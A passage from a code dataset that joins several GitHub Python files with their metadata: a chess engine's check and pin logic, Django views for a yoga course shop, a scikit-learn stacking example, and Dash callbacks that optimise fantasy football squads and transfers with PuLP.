the possible pin to an empty tuple\n for i in range(1, 8): # for each square in the direction\n endRow = startRow + d[0] * i # get the row of the end square\n endCol = startCol + d[1] * i # get the column of the end square\n\n if 0 <= endRow < 8 and 0 <= endCol < 8: # if the end square is on the board\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] == allyColor and endPiece[\n 1] != 'K': # if the end square is the ally color and is not a king\n if possiblePin == (): # if the possible pin is empty\n possiblePin = (\n endRow, endCol, d[0], d[1]) # set the possible pin to the end square and the direction\n else:\n break\n elif endPiece[0] == enemyColor: # if the end square is the enemy color\n type = endPiece[1]\n # print(\"Black King location\", self.blackKingLocation)\n # print(startRow, startCol,\" enemy found in direction \", d[0], d[1], enemyColor, type, endRow, endCol, i, j)\n # print((i == 1 and type == 'P' and ((enemyColor == 'w' and 6 <= j <= 7) or (enemyColor == 'b' and 4 <= j <= 5))))\n # if enemy piece found near King\n if (0 <= j <= 3 and type == 'R') or \\\n (4 <= j <= 7 and type == 'B') or \\\n (i == 1 and type == 'P' and (\n (enemyColor == 'w' and 6 <= j <= 7) or (enemyColor == 'b' and 4 <= j <= 5))) or \\\n (type == 'Q') or \\\n (i == 1 and type == 'K'): # if the enemy piece is a rook, bishop, queen, or king\n if possiblePin == (): # if the possible pin is empty\n inCheck = True # if enemy directly in range of King\n # print(\"king in check by: \", enemyColor, type, endRow, endCol)\n checks.append((endRow, endCol, d[0], d[1]))\n break\n else:\n pins.append(possiblePin) # if ally piece in between king and enemy\n break\n else:\n break # if no enemy found the respective direction that poses threat\n else:\n break\n\n # Special Case for Knight Moves\n knightMoves = ((-1, -2), (-1, 2), (1, -2), (1, 2), (-2, -1), (-2, 1), (2, -1), (2, 1))\n for m in knightMoves: # for each knight move\n endRow = startRow + m[0] # get the row of the 
end square\n endCol = startCol + m[1] # get the column of the end square\n if 0 <= endRow < 8 and 0 <= endCol < 8: # if the end square is on the board\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] == enemyColor and endPiece[\n 1] == 'N': # if the end square is the enemy color and is a knight\n inCheck = True # if enemy directly in range of King\n checks.append((endRow, endCol, m[0], m[1])) # add the check to the list of checks\n return inCheck, pins, checks\n\n\nclass CastleRights: # class for castle rights\n def __init__(self, wks, bks, wqs, bqs): # constructor\n self.wks = wks\n self.bks = bks\n self.wqs = wqs\n self.bqs = bqs\n\n\nclass Move:\n ranksToRows = {\"1\": 7,\n \"2\": 6,\n \"3\": 5,\n \"4\": 4,\n \"5\": 3,\n \"6\": 2,\n \"7\": 1,\n \"8\": 0} # dictionary for converting ranks to rows\n rowsToRanks = {v: k for k, v in ranksToRows.items()}\n\n filesToCols = {\"a\": 0, \"b\": 1, \"c\": 2, \"d\": 3, \"e\": 4, \"f\": 5, \"g\": 6,\n \"h\": 7} # dictionary for converting files to columns\n colsToFiles = {v: k for k, v in filesToCols.items()} # inverse dictionary for converting columns to files\n\n def __init__(self, startSq, endSq, board, isEnpassantMove=False, isCastleMove=False, AIPromotionKey='Q',\n AIPlaying=False): # constructor\n self.startRow = startSq[0] # get the start row\n self.startCol = startSq[1] # get the start column\n self.endRow = endSq[0] # get the end row\n self.endCol = endSq[1] # get the end column\n self.pieceMoved = board[self.startRow][self.startCol] # get the piece that was moved\n self.pieceCaptured = board[self.endRow][self.endCol] # get the piece that was captured\n\n # For AI:\n self.AIPromotionKey = AIPromotionKey # get the promotion key\n self.AIPlaying = AIPlaying # get the AI playing boolean\n\n # For Pawn Promotion:\n self.isPawnPromotion = False\n if (self.pieceMoved == 'wP' and self.endRow == 0) or (\n self.pieceMoved == 'bP' and self.endRow == 7): # if the pawn is at the end of the board\n self.isPawnPromotion = True # set the pawn promotion boolean to true\n\n # For Enpassant Move:\n self.isEnpassantMove = isEnpassantMove # get the enpassant move boolean\n if self.isEnpassantMove: # if the move is an enpassant move\n if self.pieceMoved == 'wP':\n self.pieceCaptured = 'bP'\n else:\n self.pieceCaptured = 'wP'\n\n self.isCastleMove = isCastleMove # get the castle move boolean\n self.moveID = self.startRow * 1000 + self.startCol * 100 + self.endRow * 10 + self.endCol # get the move ID\n\n def __eq__(self, other): # overloaded equality operator\n if isinstance(other, Move): # if the other object is a move\n return self.moveID == other.moveID # return the move ID of the move\n return NotImplemented # not comparable to non-Move objects\n\n def getChessNotation(self): # get the chess notation of the move\n return self.getRankFile(self.startRow, self.startCol) + self.getRankFile(self.endRow,\n self.endCol) # return the chess notation of the move\n\n def getRankFile(self, row, col): # get the rank and file of the square\n return self.colsToFiles[col] + self.rowsToRanks[row] # return the rank and file of the square\n","repo_name":"Daymenion/Machine-Learning-Example-Projects","sub_path":"Chess Engine Alpha-Beta Punning and MinMax Search/Engine.py","file_name":"Engine.py","file_ext":"py","file_size_in_byte":38583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21761089453","text":"from django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom Database.models import BuyRecord, Course # records of users' course purchases\nfrom Tools.SessionManager 
import SessionManager\nfrom Tools.URLPath import url_index, url_course_view_course\nfrom .forms import AddCourseForm, ModCourseForm\n\n\ndef viewCourse(request): # view course information\n sessionManager = SessionManager(request)\n if sessionManager.isAdministrator(): # if logged in as an administrator\n courses = Course.objects.all() # query all courses\n Authority = 'Admin'\n\n else: # if logged in as a customer\n courses = Course.objects.filter(course_flag=True) # query only the courses currently in use\n Authority = 'Customer'\n\n return render(request, 'coursemessageUI.html', {'order': courses, 'Authority': Authority})\n\n\ndef viewCourseDetails(request, coursename): # show detailed course information\n sessionManager = SessionManager(request)\n if sessionManager.isAdministrator(): # if logged in as an administrator\n courses = Course.objects.get(coursename=coursename) # query the current course for the detail view below\n detailcourse = BuyRecord.objects.filter(coursename=coursename) # query all orders for this course (paid and unpaid)\n Authority = 'Admin'\n\n else: # if logged in as a customer\n username = sessionManager.getUsername() # get the name of the currently logged-in user\n courses = Course.objects.get(coursename=coursename) # query the current course for the detail view below\n detailcourse = BuyRecord.objects.filter(username=username,coursename=coursename) # query this user's orders for this course (paid and unpaid)\n Authority = 'Customer'\n return render(request, 'detailmessageUI.html', {'Authority': Authority, 'courses':courses,'order1': detailcourse})\n\n\ndef addCourse(request): # administrator adds a course\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return HttpResponseRedirect(url_index)\n if request.method == 'POST':\n addcourseForm = AddCourseForm(request.POST)\n if addcourseForm.is_valid():\n coursename = addcourseForm.cleaned_data.get('coursename')\n courseintroduction = addcourseForm.cleaned_data.get('courseintroduction')\n courseprice = addcourseForm.cleaned_data.get('courseprice')\n course = Course()\n course.create(coursename,courseintroduction,courseprice)\n return HttpResponseRedirect(url_course_view_course)\n else:\n addcourseForm = AddCourseForm()\n Authority = 'Admin'\n return render(request, 'addcourseUI.html', locals())\n\n\ndef ModCourse(request, coursename): # page for editing course information\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return HttpResponseRedirect(url_index)\n if request.method == 'POST': # if the request is a form submission\n modcourseForm = ModCourseForm(request.POST) # get the form contents\n if modcourseForm.is_valid(): # validate the form\n courseintroduction = modcourseForm.cleaned_data['courseintroduction']\n courseprice = modcourseForm.cleaned_data['courseprice']\n R = Course.objects.get(coursename=coursename) # query the course object being modified\n R.setCourseIntroduction(courseintroduction)\n R.setCoursePrice(courseprice)\n return HttpResponseRedirect(url_course_view_course) # after a successful write, redirect to the course list\n else:\n r = Course.objects.get(coursename=coursename) # query the current course's information\n modcourseForm = ModCourseForm(instance=r) # create the form\n return render(request, 'modcourseUI.html', locals())\n\n\ndef DelCourse(request, coursename): # take a course off the shelf\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return HttpResponseRedirect(url_index)\n P = Course.objects.get(coursename=coursename) # first fetch the current course's information\n P.setCourseFlag(False) # take the course off the shelf\n Authority = 'Admin'\n return render(request, 'successfulUI.html', locals())\n\n\ndef reAddCourse(request, coursename): # put a course back on the shelf\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return HttpResponseRedirect(url_index)\n P = Course.objects.get(coursename=coursename) # first fetch the current course's information\n P.setCourseFlag(True) # put the course back on the shelf\n return render(request, 'successfulUI.html', 
locals())\n\n","repo_name":"shao0099876/AmyYoga","sub_path":"AmyYoga/AmyYoga/Course/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"6428877716","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn import cross_validation\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn import metrics\n# Classifiers\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\n\nnp.random.seed(2017) # seed to shuffle the train set\n\n# read the data in\ndf = pd.read_csv(\"chapter4/Diabetes.csv\")\n\nX = df.ix[:,0:8] # independent variables\ny = df['class'].values # dependent variables\n\n#Normalize\nX = StandardScaler().fit_transform(X)\n\n# evaluate the model by splitting into train and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,random_state=2017)\nkfold = cross_validation.StratifiedKFold(y=y_train, n_folds=5, random_state=2017)\nnum_trees = 10\n\nverbose = True # to print the progress\n\nclfs = [KNeighborsClassifier(),RandomForestClassifier(n_estimators=num_trees, random_state=2017),\n GradientBoostingClassifier(n_estimators=num_trees, random_state=2017)]\n\n#Creating train and test sets for blending\ndataset_blend_train = np.zeros((X_train.shape[0], len(clfs)))\ndataset_blend_test = np.zeros((X_test.shape[0], len(clfs)))\n\nprint('5-fold cross validation:\\n')\n\nfor i, clf in enumerate(clfs):\n scores = cross_validation.cross_val_score(clf, X_train, y_train, cv=kfold,scoring='accuracy')\n print(\"##### Base Model %0.0f #####\" % i)\n print(\"Train CV Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std()))\n clf.fit(X_train, y_train)\n print(\"Train Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(X_train),y_train)))\n dataset_blend_train[:,i] = clf.predict_proba(X_train)[:, 1]\n dataset_blend_test[:,i] = clf.predict_proba(X_test)[:, 1]\n print(\"Test Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(X_test),y_test)))\n\nprint (\"##### Meta Model #####\")\nclf = LogisticRegression()\nscores = cross_validation.cross_val_score(clf, dataset_blend_train, y_train,\ncv=kfold, scoring='accuracy')\nclf.fit(dataset_blend_train, y_train)\n\nprint(\"Train CV Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std()))\nprint(\"Train Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(dataset_blend_train), y_train)))\nprint(\"Test Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(dataset_blend_test), y_test)))","repo_name":"raja21068/Machine-Learning-Toturials","sub_path":"78_Stacking.py","file_name":"78_Stacking.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"18703713466","text":"import os\nimport pdb\nimport pulp\nimport random\nimport shap\nfrom pathlib import Path\nimport dash_html_components as html\nimport dash_core_components as dcc\nfrom dash.dependencies import Input, Output, State\nfrom app import app\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport plotly.graph_objects as go\nimport plotly.express as px\n\nfrom fastai.tabular import load_learner\n\ntry:\n from layouts.layout_utils import make_table, make_dropdown, make_line_plot\n from 
scripts.data_loader import DataLoader, check_cache_validity\n from scripts.data_processor import DataProcessor\n from scripts.data_scrape import DataScraper\n from scripts.utils import load_config\n from app import cache\n from scripts.data_preparation import ModelDataMaker\n from scripts.model_data_ingestion import DataIngestor\n from scripts.feature_engineering import make_XY_data\n from scripts.models import load_data, train_lgbm_model, train_fastai_model\nexcept:\n raise ImportError\n\nCONFIG_2020 = {\n \"data_dir\": \"./data/model_data/2020_21/\",\n \"file_fixture\": \"fixtures.csv\",\n \"file_team\": \"teams.csv\",\n \"file_gw\": \"merged_gw.csv\",\n \"file_player\": \"players_raw.csv\",\n \"file_understat_team\": \"understat_team_data.pkl\",\n \"scoring_gw\": \"NA\"\n}\n\nTIMEOUT = 3600\n\n\ndef add_position_dummy(df):\n for p in df.position.unique():\n df['is_' + str(p).lower()] = np.where(df.position == p, int(1), int(0))\n return df\n\n\ndef add_team_dummy(df):\n for t in df.team.unique():\n df['team_' + str(t).lower()] = np.where(df.team == t, int(1), int(0))\n return df\n\n\ndef squad_optimizer(df, formation, budget=100.0, optimise_on='LGBM Point'):\n df = df.pipe(add_position_dummy)\n df = df.pipe(add_team_dummy)\n players = df[\"name\"].unique().tolist()\n fpl_problem = pulp.LpProblem('FPL', pulp.LpMaximize)\n # create a dictionary of pulp variables with keys from names\n x = pulp.LpVariable.dict('x_ % s', players, lowBound=0, upBound=1, cat=pulp.LpInteger)\n # player score data\n player_points = dict(zip(df[\"name\"], np.array(df[optimise_on])))\n # objective function\n fpl_problem += sum([player_points[i] * x[i] for i in players])\n # constraints\n position_names = ['gk', 'def', 'mid', 'fwd']\n position_constraints = [int(i) for i in formation.split('-')]\n constraints = dict(zip(position_names, position_constraints))\n constraints['total_cost'] = budget\n constraints['team'] = 3\n # could get straight from dataframe...\n player_cost = dict(zip(df[\"name\"], df[\"cost\"]))\n player_position = dict(zip(df[\"name\"], df[\"position\"]))\n player_team = dict(zip(df[\"name\"], df[\"team\"]))\n player_gk = dict(zip(df[\"name\"], df[\"is_gk\"]))\n player_def = dict(zip(df[\"name\"], df[\"is_def\"]))\n player_mid = dict(zip(df[\"name\"], df[\"is_mid\"]))\n player_fwd = dict(zip(df[\"name\"], df[\"is_fwd\"]))\n # apply the constraints\n fpl_problem += sum([player_cost[i] * x[i] for i in players]) <= float(constraints['total_cost'])\n fpl_problem += sum([player_gk[i] * x[i] for i in players]) == constraints['gk']\n fpl_problem += sum([player_def[i] * x[i] for i in players]) == constraints['def']\n fpl_problem += sum([player_mid[i] * x[i] for i in players]) == constraints['mid']\n fpl_problem += sum([player_fwd[i] * x[i] for i in players]) == constraints['fwd']\n for t in df.team:\n player_team = dict(zip(df[\"name\"], df['team_' + str(t).lower()]))\n fpl_problem += sum([player_team[i] * x[i] for i in players]) <= constraints['team']\n # solve the thing\n fpl_problem.solve()\n\n total_points = 0.\n total_cost = 0.\n optimal_squad = []\n\n for p in players:\n if x[p].value() != 0:\n total_points += player_points[p]\n total_cost += player_cost[p]\n\n optimal_squad.append({\n 'name': p,\n # 'team': player_team[p],\n 'position': player_position[p],\n 'cost': player_cost[p],\n 'points': player_points[p]\n })\n\n solution_info = {\n 'formation': formation,\n 'total_points': total_points,\n 'total_cost': total_cost\n }\n df_squad = pd.DataFrame(optimal_squad)\n df_squad = 
df_squad.sort_values(by=['position', 'points'], ascending=False)\n return df_squad, solution_info\n\n\ndef transfer_optimizer(df_leads, manager_id, num_transfers, model_name):\n\n df_leads[\"name\"] = df_leads[\"name\"].apply(lambda x: str(x).encode('ascii', 'ignore'))\n config = load_config()\n data_loader = DataLoader(config)\n df_team = pd.DataFrame(data_loader.get_manager_current_gw_picks(manager_id))\n df_team = df_team.rename(columns={\"element\": \"player_id\"})\n bank = data_loader.get_manager_bank_balance(manager_id)\n\n df_cost = df_leads[[\"player_id\", \"cost\", \"name\", model_name]].copy()\n df_team = pd.merge(df_team, df_cost, how='inner', on='player_id')\n prev_score = df_team[model_name].sum()\n\n budget = df_team[\"cost\"].sum() + bank\n\n # print(df_team.head())\n # print(df_leads.head())\n # print(budget)\n\n # optimization\n\n df = df_leads.copy()\n df = df.pipe(add_position_dummy)\n df = df.pipe(add_team_dummy)\n players = df[\"name\"].unique().tolist()\n current_players = df_team[\"name\"].unique().tolist()\n fpl_problem = pulp.LpProblem('FPL_Transfers', pulp.LpMaximize)\n\n x = pulp.LpVariable.dict('x_ % s', players, lowBound=0, upBound=1, cat=pulp.LpInteger)\n # player score data\n player_points = dict(zip(df[\"name\"], np.array(df[model_name])))\n # objective function\n fpl_problem += sum([player_points[i] * x[i] for i in players])\n # constraints\n position_names = ['gk', 'def', 'mid', 'fwd']\n formation = '2-5-5-3'\n position_constraints = [int(i) for i in formation.split('-')]\n constraints = dict(zip(position_names, position_constraints))\n constraints['total_cost'] = budget\n constraints['team'] = 3\n constraints[\"num_keep\"] = 15 - num_transfers\n\n # could get straight from dataframe...\n player_cost = dict(zip(df[\"name\"], df[\"cost\"]))\n player_position = dict(zip(df[\"name\"], df[\"position\"]))\n player_team = dict(zip(df[\"name\"], df[\"team\"]))\n player_gk = dict(zip(df[\"name\"], df[\"is_gk\"]))\n player_def = dict(zip(df[\"name\"], df[\"is_def\"]))\n player_mid = dict(zip(df[\"name\"], df[\"is_mid\"]))\n player_fwd = dict(zip(df[\"name\"], df[\"is_fwd\"]))\n # apply the constraints\n fpl_problem += sum([player_cost[i] * x[i] for i in players]) <= float(constraints['total_cost'])\n fpl_problem += sum([player_gk[i] * x[i] for i in players]) == constraints['gk']\n fpl_problem += sum([player_def[i] * x[i] for i in players]) == constraints['def']\n fpl_problem += sum([player_mid[i] * x[i] for i in players]) == constraints['mid']\n fpl_problem += sum([player_fwd[i] * x[i] for i in players]) == constraints['fwd']\n fpl_problem += sum([x[i] for i in current_players]) == constraints['num_keep']\n\n # team constraints\n for t in df.team:\n player_team = dict(zip(df[\"name\"], df['team_' + str(t).lower()]))\n fpl_problem += sum([player_team[i] * x[i] for i in players]) <= constraints['team']\n # solve the thing\n fpl_problem.solve()\n\n total_points = 0.\n total_cost = 0.\n optimal_squad = []\n\n for p in players:\n if x[p].value() != 0:\n total_points += player_points[p]\n total_cost += player_cost[p]\n\n optimal_squad.append({\n 'name': p,\n # 'team': player_team[p],\n 'position': player_position[p],\n 'cost': player_cost[p],\n 'points': player_points[p]\n })\n\n solution_info = {\n 'formation': formation,\n 'total_points': total_points,\n 'total_cost': total_cost\n }\n # pdb.set_trace()\n df_squad = pd.DataFrame(optimal_squad)\n now_score = df_squad[\"points\"].sum()\n new_squad = set(df_squad[\"name\"].unique().tolist())\n current_players = 
set(current_players)\n transfer_in = list(new_squad.difference(current_players))\n transfer_out = list(current_players.difference(new_squad))\n transfer_in = [in_player.decode('utf-8') for in_player in transfer_in]\n transfer_out = [out_player.decode('utf-8') for out_player in transfer_out]\n df_res = pd.DataFrame()\n gain = [0 for i in range(len(transfer_in))]\n gain[-1] = now_score - prev_score\n df_res[\"Transfer In\"] = transfer_in\n df_res[\"Transfer Out\"] = transfer_out\n df_res[\"gain\"] = gain\n df_res[\"gain\"] = df_res[\"gain\"].round(2)\n df_res[\"gain\"] = df_res[\"gain\"].astype(str)\n df_res[\"gain\"] = df_res[\"gain\"].apply(lambda y: \"\" if int(float(y)) == 0 else y)\n df_res = df_res.rename(columns={\"gain\": \"Gain\"})\n return df_res\n\n\n@cache.memoize(timeout=TIMEOUT)\ndef load_leads(gw_id):\n data_maker = ModelDataMaker(CONFIG_2020)\n output_dir = \"./data/model_outputs/\"\n lgbm_point_path = os.path.join(output_dir, \"lgbm_point_predictions_gw_{}.csv\".format(gw_id))\n lgbm_potential_path = os.path.join(output_dir, \"lgbm_potential_predictions_gw_{}.csv\".format(gw_id))\n lgbm_return_path = os.path.join(output_dir, \"lgbm_return_predictions_gw_{}.csv\".format(gw_id))\n\n fastai_point_path = os.path.join(output_dir, \"fastai_point_predictions_gw_{}.csv\".format(gw_id))\n fastai_potential_path = os.path.join(output_dir, \"fastai_potential_predictions_gw_{}.csv\".format(gw_id))\n fastai_return_path = os.path.join(output_dir, \"fastai_return_predictions_gw_{}.csv\".format(gw_id))\n all_paths = [lgbm_point_path, lgbm_potential_path, lgbm_return_path,\n fastai_point_path, fastai_potential_path, fastai_return_path]\n dfs = []\n for file_path in all_paths:\n if not check_cache_validity(file_path, valid_days=2.0):\n return html.P(\"refresh model scores\")\n df = pd.read_csv(file_path)\n dfs.append(df)\n XY_train, XY_test, XY_scoring, features_dict = load_data(gw_id)\n player_id_team_id_map = data_maker.get_player_id_team_id_map()\n player_id_player_name_map = data_maker.get_player_id_player_name_map()\n player_id_player_position_map = data_maker.get_player_id_player_position_map()\n team_id_team_name_map = data_maker.get_team_id_team_name_map()\n player_id_cost_map = data_maker.get_player_id_cost_map()\n player_id_play_chance_map = data_maker.get_player_id_play_chance_map()\n player_id_selection_map = data_maker.get_player_id_selection_map()\n player_id_ave_points_map = data_maker.get_player_id_ave_points_map()\n\n df_leads = pd.DataFrame()\n df_leads[\"player_id\"] = XY_scoring[\"player_id\"].values\n df_leads[\"name\"] = df_leads[\"player_id\"].apply(lambda x: player_id_player_name_map.get(x, x))\n df_leads[\"team\"] = df_leads[\"player_id\"].apply(lambda x: team_id_team_name_map[player_id_team_id_map.get(x, x)])\n df_leads[\"next_opponent\"] = XY_scoring[\"opp_team_id\"].apply(lambda x: team_id_team_name_map.get(x, x))\n df_leads[\"position\"] = df_leads[\"player_id\"].apply(lambda x: player_id_player_position_map.get(x, x))\n df_leads[\"chance_of_play\"] = df_leads[\"player_id\"].apply(lambda x: player_id_play_chance_map.get(x, x))\n df_leads[\"cost\"] = df_leads[\"player_id\"].apply(lambda x: player_id_cost_map.get(x, x))\n df_leads[\"selection_pct\"] = df_leads[\"player_id\"].apply(lambda x: player_id_selection_map.get(x, x))\n df_leads[\"ave_pts\"] = df_leads[\"player_id\"].apply(lambda x: player_id_ave_points_map.get(x, x))\n df_leads[\"gw\"] = gw_id\n df_leads = df_leads.drop_duplicates(subset=[\"player_id\"])\n\n # merge predictions\n for df in dfs:\n df = 
df.drop_duplicates()\n        df_leads = pd.merge(df_leads, df, how='left', on=['player_id', 'gw'])\n    df_leads["cost"] = df_leads["cost"] / 10\n\n    model_name_col_map = {\n        "LGBM Point": "lgbm_point_pred",\n        "LGBM Potential": "lgbm_potential_pred",\n        "LGBM Return": "lgbm_return_pred",\n        "Fast Point": "fastai_point_pred",\n        "Fast Potential": "fastai_potential_pred",\n        "Fast Return": "fastai_return_pred"\n    }\n    col_model_name_map = dict()\n    for k, v in model_name_col_map.items():\n        col_model_name_map[v] = k\n\n    df_leads = df_leads.rename(columns=col_model_name_map)\n    df_leads["Net"] = (2 * df_leads["LGBM Point"] + df_leads["LGBM Potential"] +\n                       2 * df_leads["Fast Point"] + df_leads["Fast Potential"]) * df_leads["Fast Return"] * df_leads[\n        "LGBM Return"]\n    max_net = df_leads["Net"].max()\n    df_leads["Net"] = df_leads["Net"] / max_net\n    return df_leads\n\n\n@app.callback(Output('player-compare-output', 'children'),\n              [Input('player-selection-dropdown-a', 'value'),\n               Input('player-selection-dropdown-b', 'value'),\n               Input('gw-selection-dropdown-squad', 'value')],\n              prevent_initial_call=True)\ndef execute_player_comparison(player_a, player_b, gw_id):\n    if not player_a:\n        msg = html.P("Please select first player")\n        return msg\n    if not player_b:\n        msg = html.P("Please select second player")\n        return msg\n    if not gw_id:\n        msg = html.P("Please select gameweek in left layout")\n        return msg\n    #\n    df_leads = load_leads(gw_id)\n\n    # normalization\n    pot_div = 12\n    point_div = 6\n    return_div = 0.8\n\n    df_leads["LGBM Potential"] = df_leads["LGBM Potential"] / pot_div\n    df_leads["Fast Potential"] = df_leads["Fast Potential"] / pot_div\n    df_leads["LGBM Point"] = df_leads["LGBM Point"] / point_div\n    df_leads["Fast Point"] = df_leads["Fast Point"] / point_div\n    df_leads["LGBM Return"] = df_leads["LGBM Return"] / return_div\n    df_leads["Fast Return"] = df_leads["Fast Return"] / 0.4\n    df_leads["Net"] = df_leads["Net"] / 0.4\n    df_leads["Cost"] = df_leads["cost"] / 10.0\n\n    df_a = df_leads[df_leads["name"] == player_a].copy()\n    df_b = df_leads[df_leads["name"] == player_b].copy()\n    keep_cols = ["LGBM Point", "LGBM Potential", "LGBM Return",\n                 "Fast Point", "Fast Potential", "Fast Return", "Cost"]\n    df_a = df_a[keep_cols].copy().T.reset_index()\n    df_a.columns = ["theta", "r"]\n\n    df_b = df_b[keep_cols].copy().T.reset_index()\n    df_b.columns = ["theta", "r"]\n\n    # pdb.set_trace()\n    fig = go.Figure()\n    fig.add_trace(go.Scatterpolar(r=df_a['r'].values, theta=df_a["theta"].values,\n                                  fill='toself', name=player_a))\n    fig.add_trace(go.Scatterpolar(r=df_b['r'].values, theta=df_b["theta"].values,\n                                  fill='toself', name=player_b))\n    fig.update_layout(polar=dict(radialaxis=dict(visible=False)), showlegend=True)\n    # fig = px.line_polar(df_a, r='r', theta='theta', line_close=True)\n    graph = dcc.Graph(figure=fig)\n    return graph\n\n\n@app.callback([Output('squad-optim-output-play-xi', 'children'),\n               Output('squad-optim-output-bench', 'children')],\n              [Input('squad-optimization-btn', 'n_clicks')],\n              [State('gw-selection-dropdown-squad', 'value'),\n               State('model-selection-dropdown-optim', 'value'),\n               State('formation-selection-dropdown-squad', 'value'),\n               State('squad-value-input', 'value'),\n               State('bench-value-input', 'value'),\n               State('uncertain-flag', 'value')],\n              prevent_initial_call=True)\ndef execute_squad_optimization(n_clicks, gw_id, model_name, formation, squad_val, bench_val, uncertain_flag):\n    if not gw_id:\n        msg = 
html.P(\"Please select GW for scoring\")\n return msg, msg\n\n if not model_name:\n msg = html.P(\"Please select Model\")\n return msg, msg\n\n if not formation:\n msg = html.P(\"Please select Formation\")\n return msg, msg\n\n if not squad_val:\n msg = html.P(\"Please select Squad Value\")\n return msg, msg\n\n if not bench_val:\n msg = html.P(\"Please select Bench Value\")\n return msg, msg\n\n if not uncertain_flag:\n msg = html.P(\"Please select Uncertain Flag\")\n return msg, msg\n df_leads = load_leads(gw_id)\n # pdb.set_trace()\n df_leads[\"name\"] = df_leads[\"name\"].apply(lambda x: str(x).encode('ascii', 'ignore'))\n print(df_leads.head())\n if n_clicks:\n df_squad_xi, sol_info_xi = squad_optimizer(df_leads, formation=formation,\n budget=squad_val - bench_val, optimise_on=model_name)\n xi_players = [int(i) for i in formation.split('-')]\n bench_players = [str(2 - xi_players[0]), str(5 - xi_players[1]), str(5 - xi_players[2]), str(3 - xi_players[3])]\n bench_formation = \"-\".join(bench_players)\n xi_names = df_squad_xi[\"name\"].unique().tolist()\n df_leads = df_leads[~df_leads[\"name\"].isin(xi_names)].copy()\n df_squad_bench, sol_info_bench = squad_optimizer(df_leads, formation=bench_formation,\n budget=bench_val, optimise_on=model_name)\n\n df_squad_xi[\"name\"] = df_squad_xi[\"name\"].apply(lambda x: x.decode('utf-8'))\n df_squad_bench[\"name\"] = df_squad_bench[\"name\"].apply(lambda x: x.decode('utf-8'))\n # df_squad = df_squad[[\"position\", \"cost\", \"points\"]].copy()\n df_squad_xi[\"points\"] = df_squad_xi[\"points\"].round(2)\n df_squad_bench[\"points\"] = df_squad_bench[\"points\"].round(2)\n col_map = {\"name\": \"Player\", \"team\": \"Team\", \"cost\": \"Cost\", \"position\": \"Position\", \"points\": model_name}\n df_squad_xi = df_squad_xi.rename(columns=col_map)\n df_squad_bench = df_squad_bench.rename(columns=col_map)\n position_map = {'GK': 1, 'DEF': 2, 'MID': 3, 'FWD': 4}\n\n df_squad_xi[\"pos_map\"] = df_squad_xi[\"Position\"].apply(lambda x: position_map[x])\n df_squad_bench[\"pos_map\"] = df_squad_bench[\"Position\"].apply(lambda x: position_map[x])\n df_squad_xi = df_squad_xi.sort_values(by=[\"pos_map\"])\n df_squad_bench = df_squad_bench.sort_values(by=[\"pos_map\"])\n df_squad_xi = df_squad_xi.drop(columns=[\"pos_map\"])\n df_squad_bench = df_squad_bench.drop(columns=[\"pos_map\"])\n table_xi, table_bench = make_table(df_squad_xi, page_size=11), make_table(df_squad_bench)\n\n return table_xi, table_bench\n else:\n return html.P(\"Button Not Clicked!\")\n\n\n@app.callback(Output('transfer-suggestion-output', 'children'),\n [Input('transfer-optimization-btn', 'n_clicks')],\n [State('manager-selection-transfers', 'value'),\n State('transfer-selection-numbers', 'value'),\n State('gw-selection-dropdown-squad', 'value'),\n State('model-selection-dropdown-optim', 'value')],\n prevent_initial_call=True)\ndef execute_transfer_suggestions(n_clicks, manager_id, num_transfers, gw_id, model_name):\n if not manager_id:\n msg = html.P(\"Please select manager...\")\n return msg\n if not num_transfers:\n msg = html.P(\"Please select number of transfer to be made...\")\n return msg\n if not gw_id:\n msg = html.P(\"Please select GW for scoring...\")\n return msg\n if not model_name:\n msg = html.P(\"Please select ML Model...\")\n return msg\n\n if n_clicks:\n tables = []\n n_suggestions = 5\n df_leads = load_leads(gw_id)\n\n for i in range(n_suggestions):\n try:\n df_transfer = transfer_optimizer(df_leads, manager_id, num_transfers, model_name)\n 
tables.append(make_table(df_transfer))\n                exclude_names = df_transfer["Transfer In"].unique().tolist()\n                df_leads = df_leads[~df_leads["name"].isin(exclude_names)].copy()\n            except:\n                pass\n\n        output = html.Div(\n            children=tables\n        )\n\n        return output\n\n    return html.P("Button Not Clicked!")\n","repo_name":"rbiswasfc/fpl-portal","sub_path":"callbacks/callback_squad.py","file_name":"callback_squad.py","file_ext":"py","file_size_in_byte":19779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15403946953","text":"from django.conf.urls import url, include, re_path\nfrom ajax_select import urls as ajax_select_urls\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import RedirectView\n\nfrom . import views\nfrom .views import IndexView, RowerList, RowerDetail, RaceList, RaceDetail, RankingView, AboutView, ClubList, ClubDetail, RowerSearch, CompetitionView, CompetitionResults, RowerCompare, Compare, IndexView2, KnockoutView, WeatherCalc\nurlpatterns = [\n\t#re_path(r'^$', views.current_datetime, 